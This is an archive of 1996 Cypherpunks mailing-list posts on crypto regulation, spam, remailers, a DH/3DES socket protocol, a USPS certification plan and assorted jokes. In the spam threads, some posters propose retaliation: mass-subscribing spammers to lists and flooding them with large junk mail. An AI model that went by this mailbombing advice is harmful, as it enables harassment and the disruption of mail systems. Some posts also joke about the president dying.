Date: Fri, 23 Aug 1996 17:03:18 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
In-Reply-To: <Pine.SUN.3.91.960822182617.15085A-100000@dorsai>
Message-ID: <Pine.LNX.3.93.960823011032.492C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Aug 1996, Ray Arachelian wrote:
> On Wed, 21 Aug 1996, Timothy C. May wrote:
> > But I agree that "no action" is pretty likely. "I hope you die" has been a
> > time-honored insult at least since I was a kindergartner, and presumably
> > for many decades prior to this. Hardly an active threat.
> many years, die of old age.  No, I hope he doesn't get elected.  That's 
> what I hope. :^)  Not that I'd want Dole either. :(
> 
> How about you Tim, when are you running for prez?  Heheheh!

     I think it's a good idea. Tim May for President, Jim Bell for Vice. 
That'll keep Tim in line...

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Aug 1996 04:18:31 +0800
To: cypherpunks@toad.com
Subject: "Regulation of Commerce" and the Crypto Issue
Message-ID: <ae432be9000210041c17@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



It seems to me that in recent years nearly any type of sweeping legislation
is justifed, constitutionally, by the clause in the U.S. Constitution which
says Congress shall have the power to regulate commerce. (More precisely,
the clause says: "To regulate commerce with foreign nations, and among the
several states, and with the Indian tribes;" This is usually interpreted to
mean _interstate_ commerce, and not sales/commerce/etc. that do not
centrally involved more than one state....obviously nearly all things sold
in one state are sold in other states, so there is lattitude for applying
the commerce clause, albeit wrongly.)

Today's news is the sweeping new restrictions on tobacco and cigarettes,
including restriction on advertising and even on the placement of tobacco
and cigarette logos and names on sports jerseys and shirts. (The
much-publicized press event is not for another hour, as I write, so I don't
know all the details. I'll be watching.)

Note that similar restrictions on alchohol advertising were recently struck
down by the Supreme Court as being unconstitutional infringements on free
speech. Many expect the same outcome with these latest proposed
restrictions. (The issue of advertisements of hard liquor, cigarettes,
condoms, and other "unhealthful" [sic] products on television and radio is
of course complicated by the role of the Federal Communications Commission
and by "gentlemen's agreements" not to carry advertisements for some
products.)

Personally, I have never smoked, nor chewed, nor mainlined nicotine.
Personally, I dislike cigarette smoke. But this is all _personally_.

If a restaurant, bookstore, airline, bar, antique store, gym, or whatever
wishes to allow smoking (or not), this is there choice. As many of us see
things, it is not for the government to take a kind of "poll" of what
people like and dislike and then to impose rules on property owners as to
what smoking or nonsmoking policies they may set.

Likewise, if I want to silk-screen a "Joe Camel" image, or a "Bud Frogs"
image, on a t-shirt, this is between me and the putative owner of these
images. Free speech and all. Or, to remove any confusion with the issue of
owned logos, to silk-screen a fictitious cigarette brand on a shirt and
then wear it, or sell it. It seems likely that individual wearers of such
shirts will not be busted (think of how many already exist, and there is no
plan for confiscating them), but that the burden will be placed, as it is
so often conveniently placed, on the shirt makers.

The catch-all for these laws seems to be the "regulate commerce" language
in the Constitution. Cigarettes are sold in multiple states, the logic
goes, so the commerce clause gives the government the power/authority to
regulate it.

(Well, Steven King novels are sold in all 50 states, too. Does this
"regulate commerce" clause give the government the power/authority to
regulate what King puts in his novels? Or to ban advertising for Steven
King novels? Or to require that stores only sell such novels to adults?)

This language is already being cited for some as a justification for
regulating encryption (hey, some businesses use it!), digital signatures
(ditto), and other forms of crypto.

In fact, since nearly everything involves "commerce" in some way, whether
interstate or not, the "regulate commerce" clause can presumably be used as
a jusitification for interfering in all sorts of areas.

The several legal experts out there on this list can clarify any errors of
interpretation I have made. I certainly know that the commerce clause
cannot be used to suppress certain kinds of speech, though the boundaries
of where it may be applied seem unclear.

I do expect it to be used for crypto, though, and this might even be upheld
by the Supremes, especially in any areas directly involving "digital
commerce."

We should watch for this, and think about ways to deflect or derail such
interpretations.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Fri, 23 Aug 1996 18:48:42 +0800
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.BSF.3.91.960821150339.9917H-100000@mercury.thepoint.net>
Message-ID: <199608230336.DAA00609@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> Free (commercial)speech for you (perhaps at our expense), but no free 
> speech for us?

This is peculiar. Nobody seems to mind ads in Newspapers, printed magazines, TV, and for that matter
web sites. That is unwanted stuff too, but now someone is paying for it. Though one can argue it out, on
many grounds :

1. If the guy has to pay for it, he'll do it in limits.
2. He must have selected the context carefully, so the ad is most prolly of 
   some use to its audience
3. He'll tend to talk sense.

 
- Vipul






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Fri, 23 Aug 1996 19:39:45 +0800
To: asgaard@Cor.sos.sll.se (Asgaard)
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.HPP.3.91.960821144412.10644C-100000@cor.sos.sll.se>
Message-ID: <199608230341.DAA00616@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> On Tue, 20 Aug 1996, Timothy C. May wrote:
> 
> > There are technological fixes which I would favor over attempts to ban
> > unwanted messages.
> 
> In the meantime, before these technological fixes are easily implemented,
> what is the proper way to handle unwanted commercial mail?
> 
> 1) delete immediately
> 
> 2) reply with 'Fuck off, morons!'
> 
> 3) as in 2) plus an attachment of some 1Mb file
> 
> 4) as in 3) plus a CC to the postmaster of the sending site
> 
> What if the spam says: 'Do only reply to this if you want
> further contact with us' etc?
> 
> Does anybody have good advice, including risks for retaliation
> from the vendors/postmasters for such 're-spam'?

Subscribe them to cypherpunks, lots of times (if that is possible) and don't tell em hot to get off :)

Alternatively have a moderated "spam.die.die" mailing list and subscribe the culprit too this list.
Generate lot of data (like Octal dumps of entire hard disks) and keep sending out mails to these guys
on regular basis.

- Vipul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Fri, 23 Aug 1996 21:21:55 +0800
To: Skip <qut@netcom.com>
Subject: Re: Racists Speak Up For Crypto
In-Reply-To: <199608230353.UAA23980@netcom13.netcom.com>
Message-ID: <Pine.GUL.3.95.960823034955.852E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Come on, Skippy, you know Ingrid doesn't like to be called "racist."

But seriously, any time she forwards something from Declan that actually
advances freedom, I think that's great.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Aug 1996 20:03:14 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <199608230336.DAA00609@fountainhead.net>
Message-ID: <eRX4sD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Vipul Ved Prakash <vipul@pobox.com> writes:

> > Free (commercial)speech for you (perhaps at our expense), but no free
> > speech for us?
>
> This is peculiar. Nobody seems to mind ads in Newspapers, printed magazines,
> web sites. That is unwanted stuff too, but now someone is paying for it. Thou
> many grounds :
>
> 1. If the guy has to pay for it, he'll do it in limits.
> 2. He must have selected the context carefully, so the ad is most prolly of
>    some use to its audience
> 3. He'll tend to talk sense.

The advertizers in printed & broadcast media exercise a great deal of control
over the content. E.g., a magazine that gets revenues from tobacco ads isn't
likely to run a story about tobacco companies trying to addict kids. That's
why you see more anti-tobacco content in broadcast media (who can't run
tobacco ads) than in printed media. (And there are cross-ownership
restrictions.)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 23 Aug 1996 22:13:14 +0800
To: zachb@netcom.com
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608231151.HAA04754@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


true, then there are those who are brain dead, and continue to participate,
notice that i did not say serve, in public office for years.

	-paul

> From zachb@netcom.com Thu Aug 22 19:18:40 1996
> Date: Thu, 22 Aug 1996 16:18:23 -0700 (PDT)
> From: "Z.B." <zachb@netcom.com>
> Subject: Re: Husband/Wife jailed for saying Clinton Sucks
> To: pjb@ny.ubs.com
> Cc: cypherpunks@toad.com
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Content-Length: 487
> 
> On Thu, 22 Aug 1996 pjb@ny.ubs.com wrote:
> 
> > perhaps we should all add a line to our sigs to the effect that we hope
> > he dies, and soon, natural causes, of course. Hmmm, what exactly does 
> > 'natural death' include?
> > 
> > 	-paul
> 
> When I read this, a quote from a certain famous sci-fi writer came to mind:
> "All forms of death are ultimately due to heart failure."
> 
> 
> ---
> 
> Zach Babayco
> 
> zachb@netcom.com  <----- finger for PGP public key
> http://www.geocities.com/SiliconValley/Park/4127
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 23 Aug 1996 16:36:01 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks the movie
Message-ID: <199608230621.IAA23398@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


why stop at a video why not a musical.... "Cypherpunk The Musical"  Broadway here we come...

Featuring Songs:

"PGP why is it so hard to break"

"We write code"

"Why were we called shitopunks?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Sat, 24 Aug 1996 01:34:05 +0800
To: cypherpunks@toad.com
Subject: Re: Lesson 2 in cracking (cryptoanalysis 001)
Message-ID: <960823082541_185921635@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-08-21 20:43:50 EDT, you write:

>The point is that if you took two novels by the same author and
>completely sorted them alphabetically they'd be almost the same.

The examples cited did this by word, not by message as your stating.

>So a block of PGP encrypted ascii-armored (i.e. 8=>7-bit encoding)
>wouldn't affect the frequency counts?  Tell me, how long have you been on
>your current medications?

I was talking about the algorithm as given, not PGP.

> That's the point!! IT'S A JOKE!!! You know, "hahaha - very funny"? Not a
>  serious proposal?

I know! But at least it is relevent to the group!  How many points of attack
have you seen on here?  How many techniques have shown up here?

P.S.

My apologies to the fella I called a troll.  It was uncalled for - lacking in
social skills.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sat, 24 Aug 1996 00:50:41 +0800
To: raph@kiwi.cs.berkeley.edu
Subject: Middleman has a new name!
Message-ID: <Pine.NEB.3.93.960823083120.19321A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


	It has been brought to my attention that the name "middleman" is
too long for the DOS-based remailer programs. In lieu of this I'm changing
the listed name middleman@jpunix.com to middle@jpunix.com. The change will
be effective for both the type-I and type-II remailers. I will also make
this change to the type2.list/pubring.mix files shortly. The remailers
will continue to also answer to middleman@jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 24 Aug 1996 02:36:39 +0800
To: cypherpunks@toad.com
Subject: Re: U.S. Army Private Faces Spying Charges
In-Reply-To: <199608231317.GAA09793@toad.com>
Message-ID: <199608231556.IAA08825@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:

> If this guy is guilty (and I have no particular reason to doubt it), 
> I was still under the impression that treason carried the death penalty 
> only in wartime.

The death penalty for spying on the part of members of the military
was part of the new and improved federal death penalty passed a number
of years back.  It added some 35 new federal death penalty offenses.
I don't recall whether saying "Clinton sucks" was included amongst them.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 23 Aug 1996 23:57:26 +0800
To: <cypherpunks@toad.com
Subject: Re: U.S. Army Private Faces Spying Charges
Message-ID: <199608231317.GAA09793@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Thomas C. Allard wrote:
> > 
> > His father said an Army major at Fort Bragg, whom he declined to name,
> > had urged him to persuade his son to sign a confession, so prosecutors
> > would not seek the death penalty.
> 
> Isn't plea bargaining wonderful?
> 
> Gary

Iff this guy is guilty (and I have no particular reason to doubt it), I was still under
the impression that treason carried the death penalty only in wartime.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@HellSpawn>
Date: Sat, 24 Aug 1996 01:27:42 +0800
To: cypherpunks@toad.com
Subject: ctcp.0.9
Message-ID: <Pine.LNX.3.91.960823093958.882A-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is a program i found on unimi that offers secure socket connections, 
utilitizing a simple server/client. It can be installed without root 
priveledges and uses d/h for key transfers. Anyone looked this package 
over, and if so what is your oppinion about it? 

Included below is the THEORY file that describes the key exchange:



The encryption negotiation is performed using a protocol similar to
FTP/SMTP/NNTP.  The client sends commands to the server and the server
returns a four-digit response code.  Unless stated otherwise, all numbers
in this document are hexadecimal with the most significant byte first.

When a connection is initiated, the server should send a 2000 response
indicating that it is ready to accept commands.

Commands:

DH3DES - Diffie-Hellman Key exchange followed by Triple-DES encryption
      If supported, 3001 is returned.
      The following commands are then expected:

MOD - If an argument is supplied, it is the number, in hexadecimal, to use
      as the modulus.
      Responses:
       2210 - okay
       4031 - invalid number
       4032 - too small
       4033 - too large
      If no argument is given, the server should supply the modulus, sending
      2211 followed by the modulus.  If the server is unable to supply a
      modulus, 4034 should be returned.

GEN - this should follow MOD.  The generator to use.  The format is the same
      as that of the MOD command. The response codes are 2210, 2211, 4031
      or 4034

EXCH - Key exchange
      Client sends exch followed by gen raised to hir secret exponent.
      Server sends 4030 if a gen/mod has not been agreed upon.
      otherwise 2212 followed by gen raised to its exponent

ENCR - Begin encrypted Session
       
       4020 - No key selected for encryption
       2300 - Encrypted session begin

LPORT xxxx - this command takes a 16-bit hexadecimal port number argument,
      and connects to the specified TCP port on the local host.
      Responses:
       2400 - connected
       4010 - Unable to connect
       4011 - Access denied

RPORT xxxxxxxxxxxx - Connect to remote port
      The argument to this command is a 48-bit hexadecimal number representing
      the IP address and port number to connect to.  The response should be
      first 2500, then when the connection has been attempted:
       2400 - connected
       4010 - Unable to connect
       4011 - Access denied

QUIT - quit
      Response: 2100 - Goodbye


Summary of error codes:

1xxx - informational messages
10xx - server is supplying additional information that the client may
       ignore.
11xx - server is responding to a client's request for information
2xxx - okay
20xx - Server is ready
21xx - Disconnect, goodbye
22xx - Command okay
23xx - Encrypted session begins now
24xx - Session with another service begins now
25xx - Command ok, operation in progress, please wait
3xxx - ok so far, send the rest
4xxx - command was okay but could not be processed
5xxx - command not understood or not implemented


Triple-DES 

The triple DES encryption uses output feedback exclusive-ored with a
non-sequential counter.  There are three counters, each of which is
exclusive-ored with the data block before encryption with the
corresponding key.  The counters are incremented in each round by a
shared, secret value which is part of the total key.  The result of
each round of encryption is exclusive-ored with the data stream.

I0 ------          -----
         |        |     |
I1 ----- | ---A1------- | --->
     \   |        | \   |
      --XOR       |  --XOR
         |        |     |
         E1       |     E1
         |        |     |
I2 ----- | ---A2------- | --->
     \   |        | \   |
      --XOR       |  --XOR
         |        |     |
         E2       |     E2
         |        |     |
I3 ----- | ---A3------- | --->
     \   |        | \   |
      --XOR       |  --XOR       
         |        |     |        
         E3-------^     E3-------^
         |              |
         v              v
       XOR with data stream

I0 - Initialization Vector
I1 - Initialization of counter 1
I2 - Initialization of counter 2
I3 - Initialization of counter 3
E1 - Encryption with Key 1
E2 - Encryption with Key 2
E3 - Encryption with Key 3
A1 - Add increment value 1
A2 - Add increment value 2
A3 - Add increment value 3


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh219rGlo8DEMb2JAQEzWgP/VpcWiL8+UN+7l7wCtUr6N5Bk4iqG5fYq
Jb9ImvVA3h2k8cGz/ETBQW/3H9GA9jCsqzLrgcUewAa8CgdmhPoVE04e2scAxp4l
y2peJlQmakCl2RCKHJZPTTaOLnsBU4NCZxwW8Q4xeUb0KBYfiW9XeULleyhhfsO2
n7XYpc4XhaY=
=vGhK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@sso-austin.sps.mot.com (Ben Combee)
Date: Sat, 24 Aug 1996 02:18:30 +0800
To: sryan@reading.com (steven ryan)
Subject: Re: Cypherpunks the video
In-Reply-To: <2.2.32.19960823023300.0071c9f0@reading.com>
Message-ID: <9608231455.AA28948@sso-austin.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


* There was talk earlier about someone putting together a Cypherpunks video.
* What ever came of that? I now have access to an Avid nonlinear digital
* editor and would be interested in pursueing this.

Hi, Steven.  The Austin Cypherpunks are the ones working on this,
although the effort level has been low lately.  We were planning on
leveraging Austin's excellent public access facilities to produce the
video cheaply, but time constraints of the group's members got in the
way.

Right now, we're mostly dependent on good scripts.  We have a few scenes
down, but we need more material to finish the work.  Editing will come,
but we need the basic script and footage now.

You can see some notes on this at my crypto page at

	http://www.yak.net/combee/crypto/

-- 
Ben Combee, Software Developer (Will write assembly code for food)
Motorola > MIMS > MSPG > CTSD > Advanced ICs > Austin Design Center
E-mail: combee@sso-austin.sps.mot.com   Phone: (512) 891-7141




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <ptrei@ACM.ORG>
Date: Sat, 24 Aug 1996 01:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: USPS
Message-ID: <199608231401.HAA10139@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 5:14 PM 8/22/96, Bruce M. wrote:
> 
> >Web Week, July 8, 1996, p3
> 
> >    The Postal Service's attorneys have told the USPS that the tampering
> >part of the current federal law would transfer to the electronic space,
> >and that the mail fraud portion might also apply...
> >
> >    "We're a trusted third party," Saunders said.  "We don't have any
> >interest in learning your trade secrets...

Back in June I attended a presentation on this from Paul Raines, who
is running the program. As I recall, there were three services they were
planning to offer. 

1. A time-stamping service. This is basically a remailer - you would
send email to the USPS site, which would add a digital timestamp
and signature, then forward the message to it's ultimate recipient.
Customers wishing to use the service would deposit a sum of money
with the USPS, which would be debited for each use of the service
(suggested cost was on the order of 25 cents/message)

2. A CA service. Keys would be signed at various levels of assurance.
At least at the start, business strength keys would be issued only at
Postal Business centers, which are in about 100 cities in the US.

3. An archival service. For a fee, the USPS would store copies of all of
  the email you send though it's remailer. Only the sender could
  retrieve it, short of a court order. In answer to a direct question, Raines
  said that user-encrypted data was OK.

Raines claimed the following advantages:

* The contents would be subject to the postal fraud statutes. 
* People would trust a message received through the remailer more
  than one which was not.
* IRS tax filings sent through the Postal system can arrive after April
  15, provided they are postmarked before that time. Tax filings sent by
  other methods must be received at the IRS before midnight on the
  15th.
* Approximate quote: "When business negotiate a deal, they do it
  over the phone, in person, etc. But when the deal is closed, what do
  they do? They write a letter, and send it via registered mail through
  the USPS."
* As a CA, the USPS was a known and trusted entity overseas, unlike
  commercial CA services.

Some specific counter arguments:

Fraud protection:  If a person was intending to commit fraud, why 
would he or she send the message through the USPS remailer?
Since the service is costly, most email will never be sent through
it, and there will not develop a tendency to regard non-USPS email
as untrustworthy.

IRS filings: If I send a tax filing to the USPS remailer at 23:45 on
April 15th, it gets a pre-midnight timestamp and is accepted by the
IRS as being on time. If I send an email tax filing directly to the IRS
at 23:45, it is also accepted (and if I was that desparate, I could also
bounce the message through Hawaii, or US Samoa, and get several
more hours of grace) Also, I was under the impression that the IRS
now accepted FedEx timestamps for tax filings. Finally, the amount
of business which this represents is miniscule.

Closing deals: Ever hear of faxes or FedEx?

My personal impression was that Raines had been listening to his 
own propaganda for too long, and was rather out of touch with the 
way things are done outside of the Beltway. I got the feeling that 
the USPS was desperately trying to find a role in a time where it
was becoming merely the cheapest and slowest player in the 
package delivery business. 
 


Peter Trei
ptrei@acm.org
[Disclaimer: I am not representing my employer.]     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Aug 1996 04:13:32 +0800
To: cypherpunks@toad.com
Subject: Verdict in "MTV" Case
Message-ID: <ae43349d010210042760@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Indiannapolis, IN (A.P.) -- A jury has awarded the State of Indiana $25
million in damages in the case of "Indiana v. Music Television." Music
Television, also known as MTV, was accused of costing the state of Indiana
more than $100 million in additional educational expenses due to students
watching MTV when they should have been doing their homework. The jury
foreman in the case was quoted as saying, "Like, like the kids are, like,
goofin' off. Besides, MTV doesn't like play enough old stuff, like Zeppelin
and Floyd."

Following the various court decisions to award damages to states for
medical costs associated with smoking by state residents, a barrage of
similar lawsuits is happening across the country. School systems are suing
book publishers, movie makers, television broadcasters, shopping malls, and
miniature golf arcades. Makers of sports equipment are facing crippling
lawsuits by insurers. The last remaining American bicycle maker, Trek,
announced that it is withdrawing from the U.S. market, following the $37
million judgement against it in "Oregon v. Trek."

--Klaus! von Future Prime






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 24 Aug 1996 05:03:18 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) ANNOUNCE: Free Little PGP Credit Card App
Message-ID: <2.2.32.19960823180311.00fbab94@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:54 PM 8/22/96 -0400, Damaged Justice wrote:
>>From: "David j. Sopuch" <djs@iwinpak.com>
>Newsgroups: comp.infosystems.www.misc
>Subject: ANNOUNCE: Free Little PGP Credit Card App
>Date: Thu, 22 Aug 1996 12:00:24 -0400
>Organization: Datamax Research corp.
>Lines: 10
>Message-ID: <321C8418.2647@iwinpak.com>
>
>v2.08 of the iWinpak Internet Payment System is now available in
>both freeware and shareware versions at http://www.iwinpak.com

An interesting little piece of CGI code, but the demo leaves a bit to be
desired.  The demo is for bank checks.  The order form has you sending your
bank information (including bank number and check info) in the clear. So the
hooks into your credit card are not sent in the clear, but the ones to your
bank are...  Double plus ungood.

It is a start...  How good of one, I am not certain though...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Sat, 24 Aug 1996 02:55:11 +0800
To: cypherpunks@toad.com
Subject: Re: Spamming (Good or Bad?)
Message-ID: <3.0b11.32.19960823114947.006d7d7c@central.tansoft.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:35 AM 8/23/96 +0000, Vipul Ved Prakash wrote:
>
>This is peculiar. Nobody seems to mind ads in Newspapers, printed 
>magazines, TV, and for that matter web sites. That is unwanted stuff

I'd suggest that most/all of us 'mind' ads in papers, tv, etc.  The 
difference is that while we can do nothing about commercials on
TV (short of breaking federal law and jamming the signal) we can
do something about spam.  If there is enough concensus we can
develop/distribute/encourage the use of  new mailers that will help
defeat spam.  

 For example:  If mail comes into a server that has more than 25
recipients then it is only forwarded to those who have "signed up"
for that sender.  When we subscribe to Cypherpunks we also have
to register that with our network of mail servers.  Then if Mr. Spam
sends stuff out it's not been "signed up" for so it gets trashed.

I don't really like mail servers redirecting my mail, but perhaps we
could arrive at a reasonable criteria for filtering if we tried real hard.

 Jim
Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 24 Aug 1996 04:18:50 +0800
To: cypherpunks@toad.com
Subject: The Future Of Cyber Terrorism
Message-ID: <2.2.32.19960823171738.0073c5c4@206.33.128.129>
MIME-Version: 1.0
Content-Type: text/plain


The Future Of Cyber Terrorism

The proceedings or a recent conference on the subject of Cyber
Terrorism are now available online. The conference looked at terrorism
carried out with the tools of today's information age and against the
computer and information systems that the world increasingly depends
upon.
World Wide Web: http://www.acsp.uic.edu/OICJ/CONFS/terror02.htm
_______________________
Regards,            I hate quotations. -Ralph Waldo Emerson
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 23 Aug 1996 22:05:15 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Spamming (Good or Bad?)
In-Reply-To: <Pine.LNX.3.93.960822181440.170B-100000@smoke.suba.com>
Message-ID: <321D9635.2C67412E@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> 
> On Wed, 21 Aug 1996, Timothy C. May wrote:
> > At 6:04 PM 8/21/96, Gary Howland wrote:
> > >Often I'll ask a stupid question too ("Does your software work in
> > >France?").  If more people did this, then they'd have to choose their
> > >victims a bit more carefully in the future (assuming of course they're
> > >trying to sell something).
> >
> > As I said in my last message, I don't even do this--I just bounce it back
> > to them.
> > I see no need to "ask questions" (such as "Does it work in France?") to,
> > perhaps, "establish legitimacy." If they sent it to me, I can send it back.
> > Simple.
> 
>      I think that the purpose of asking a question is to consume _more_ of their
> time. If they read it, they have to decide if and how to respond. Cousme more
> of their resources. It might even be interesting to write a script that automatically
> inserts a silly question (like "does it work in france") and mails it back with the
> single stroke of a key.

Sure, I bounce it back to them too, by quoting the whole post - but like
snow says, I try to consume their time by asking stupid questions.  I
feel it is important to show a little interest in their product or
service in order that they can't tell the genuine replies from the
anti-spam replies, which should (hopefully) mean they'll target their
spam a little more carefully in future.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "JOHN E. HOLT" <76473.1732@compuserve.com>
Date: Sat, 24 Aug 1996 04:50:13 +0800
To: <cypherpunks@toad.com>
Subject: secret message
Message-ID: <960823180037_76473.1732_BHT157-4@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


Date:  01-Aug-96 14:50 EDT
From:  JOHN E. HOLT [76473,1732]
Subj:  puzzle

	^%}{{
ZZ
VVPAGMIGJEKMCCHIAKKPEHJDDDLOABGAMMJOCDFNOLNOKKKNIADPBGPPOEPIDCEMPGWW
VVFCMOPKLKPJOHCNCJBDGOOJKFANCJJBDBMDIFIEKEDPLKDDGMPLHMIIPIJFMKOLENWW
VVCAKJGJCKPAEOOMLJPNFJEKEINIHFKHNOLPCAHLEKHHLMHJFCOEKAFAGPHJBCPBHBWW
VVOKLAENICAFDHEOEODMHMFGIONMAACAOHEOHDAJDNENGAHABNHGOCCPJNFDMAMKADWW
VVMGDHKGPKBEIDBNLOCMLFMEIOKBFBFKJIMIIIFKJDFENCBPAPFBAOFMHEDODBFFPDWW
VVOMFFJBNGEJPLGHJLFOBLFOGCBKAACEICLBIKHGILKCLMHPFIAHPDEOOODPPMLGDNWW
VVGLDNEBDINMILDJDOJOJNKCLIBBKBCBEJPBJCFHGKMFLLEPGLGOOIIGAKJEGNPFHDWW
VVIJBMFLALHPEHHGEGPCLGILBDBMEGMOGOIFBPPONGEDJPNFNMPCJFJPAEMIDOEMBLWW
ZZ
ZZ



Distribution:

To: ME > [76473,1732]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 24 Aug 1996 01:32:21 +0800
To: cypherpunks@toad.com
Subject: IE Security Flaw
Message-ID: <199608231406.OAA29640@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Markoff reports today on the MS IE security flaw discovered by the
Princeton team and posted here recently. 
 
 
See: 
 
 
http://www.nytimes.com/yr/mo/day/news/financial/web-browser-flaw.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chris230@juno.com (Chris J Samuelson)
Date: Sat, 24 Aug 1996 05:42:16 +0800
To: cypherpunks@toad.com
Subject: Anonymous Remailers
Message-ID: <19960823.145710.3030.2.chris230@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


When you mail an item through more than one anonymous remailer, how does
that make it anymore anonymous, or doesn't it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@fairgate.com>
Date: Sat, 24 Aug 1996 07:04:12 +0800
To: cypherpunks@toad.com
Subject: FW: Cryptography Revisited
